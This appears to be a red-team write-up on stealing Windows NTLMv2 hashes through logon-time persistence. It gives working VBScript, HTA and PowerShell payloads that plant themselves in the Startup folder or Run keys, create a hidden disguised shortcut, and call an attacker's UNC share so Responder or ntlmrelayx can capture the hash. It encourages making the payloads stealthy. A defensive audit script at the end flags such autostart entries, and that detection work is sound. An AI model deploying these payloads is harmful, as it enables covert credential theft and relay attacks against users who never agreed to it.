stihl did not provide any additional information.
Because you still need to drop a script on the target machine (for example, by tricking a user into running a payload or planting it via social engineering), it is not considered 0-click, so no CVE.
Once you’ve done that, however, it runs entirely in the background and harvests NTLMv2 hashes without any further prompts.
Why It Works
- Native auto-execution: Leverage login-time paths Windows trusts by default (Startup folder, Run-registry key).
- Built-in COM objects: No exotic payloads or deprecated file types needed — just Shell.Application, Scripting.FileSystemObject and MSXML2.XMLHTTP and more COM objects.
- Automatic NTLM auth: When your script points at a UNC share, Windows immediately tries to authenticate with NTLMv2.
Attack Flow
1. Plant your script
- Copy your .vbs (or .ps1) into the user’s Startup folder
- Or add an HKCU\…\Run registry entry

2. Instantiate COM components
Code:
Set sh = CreateObject("Shell.Application")
Set fso = CreateObject("Scripting.FileSystemObject")
Set http = CreateObject("MSXML2.XMLHTTP")
3. Trigger a UNC connection
Code:
sh.NameSpace "\\attacker-server\share"
http.Open "GET", "\\attacker-server\ping", False
http.Send
4. Capture the hash
- Windows automatically negotiates NTLMv2 when accessing \\attacker-server\…
- Attacker runs Responder, ntlmrelayx, or similar to grab and relay the hash

You can be really creative with your payload:
Copy-Item .\ntlmleak.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
Code:
<job>
<script language="VBScript">
On Error Resume Next
attacker = "\\xxxxxxx\leak"
Set sh = CreateObject("Shell.Application")
sh.NameSpace attacker
Set fso = CreateObject("Scripting.FileSystemObject")
fso.OpenTextFile attacker & "\trigger.txt", 1
Set http = CreateObject("MSXML2.XMLHTTP")
http.open "GET", attacker & "\test", False
http.send
</script>
</job>
The VBScript code leverages a combination of COM objects (Shell.Application, Scripting.FileSystemObject, and MSXML2.XMLHTTP) to initiate outbound connections that can trigger NTLM authentication attempts. While this example is written in VBScript, similar techniques can be implemented in other languages that support COM automation.
Get creative — mix and match .lnk, .vbs, .ps1 (or any combination of them) to craft a truly stealthy payload.
Code:
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\OfficeSync.lnk")
$Shortcut.TargetPath = "mshta.exe"
$Shortcut.Arguments = "\\xxxxxxxxx\leak\leak.hta"
$Shortcut.WindowStyle = 7 # Hidden
$Shortcut.IconLocation = "shell32.dll, 13"
$Shortcut.Save()
Code:
<html>
<head>
<HTA:APPLICATION ID="NTLMLeak" APPLICATIONNAME="NTLMLeak" BORDER="thin" />
<script language="VBScript">
On Error Resume Next
attacker = "\\xxxxxxxxxx\leak"
' Shell COM object (triggers share access)
Set sh = CreateObject("Shell.Application")
sh.NameSpace attacker
' FileSystemObject COM
Set fso = CreateObject("Scripting.FileSystemObject")
fso.OpenTextFile attacker & "\trigger.txt", 1
' MSXML2
Set http = CreateObject("MSXML2.XMLHTTP")
http.open "GET", attacker & "\test", False
http.send
' IE COM nav to UNC path
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "file://" & attacker & "\xaml.xaml"
' Cleanup
Set sh = Nothing
Set fso = Nothing
Set http = Nothing
Set ie = Nothing
</script>
</head>
<body>
<h1>Loading...</h1>
</body>
</html>
Why You Care
- Red-Team POV: Reliable persistence + credential grab in one step — no click-through dialogs, no Office macros.
- Blue-Team POV: Prioritize detection on creation of unexpected Run-keys/Startup scripts and unusual SMB outbound attempts at user logon.
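For the blue-team side, here is an added audit script (not from the original post) that walks the two autostart paths the post relies on, the per-user Startup folder and the HKCU Run/RunOnce keys, and flags entries that launch a script host or carry a UNC path, resolving .lnk targets the way the OfficeSync.lnk example would need. The default Windows paths and the "run as the audited user" assumption are mine.

```powershell
# Added example, not code from the original post.
# Assumes it runs in the context of the user being audited; paths are Windows defaults.
$startup = Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup'
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'

# Things worth a second look: script hosts / HTA launchers and UNC (\\host\share) targets.
$hostPattern = '(?i)(wscript|cscript|mshta|powershell|pwsh)(\.exe)?\b|\.(vbs|wsf|hta|ps1|js)\b'
$uncPattern  = '\\\\[^\\\s"]+\\'

$findings = New-Object System.Collections.Generic.List[object]

function Add-Finding($Source, $Name, $Command, $Reason) {
    $findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Command = $Command; Reason = $Reason })
}

function Test-Suspicious($text) {
    $reasons = @()
    if ($text -match $hostPattern) { $reasons += 'script host / scripting file' }
    if ($text -match $uncPattern)  { $reasons += 'UNC path' }
    return $reasons
}

# 1. Startup folder: inspect every file; resolve .lnk target + arguments, read small scripts
$wsh = New-Object -ComObject WScript.Shell
Get-ChildItem -Path $startup -File -Force -ErrorAction SilentlyContinue | ForEach-Object {
    $cmd = $_.FullName
    if ($_.Extension -ieq '.lnk') {
        $lnk = $wsh.CreateShortcut($_.FullName)   # reads an existing shortcut
        $cmd = "$($lnk.TargetPath) $($lnk.Arguments)"
    } elseif ($_.Length -lt 1MB) {
        # include file content so a UNC path embedded in a .vbs/.hta/.wsf is caught too
        $cmd += ' ' + (Get-Content -Raw -LiteralPath $_.FullName -ErrorAction SilentlyContinue)
    }
    $why = Test-Suspicious $cmd
    if ($why) { Add-Finding 'StartupFolder' $_.Name $cmd ($why -join ', ') }
}

# 2. HKCU Run / RunOnce values (skip the PS* metadata properties Get-ItemProperty adds)
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties | Where-Object { $_.Name -notmatch '^PS' }) {
        $why = Test-Suspicious ([string]$p.Value)
        if ($why) { Add-Finding $key $p.Name $p.Value ($why -join ', ') }
    }
}

$findings | Format-Table -AutoSize
```

Pair the output with outbound SMB (TCP 445) telemetry at logon time to confirm whether a flagged entry actually reaches out.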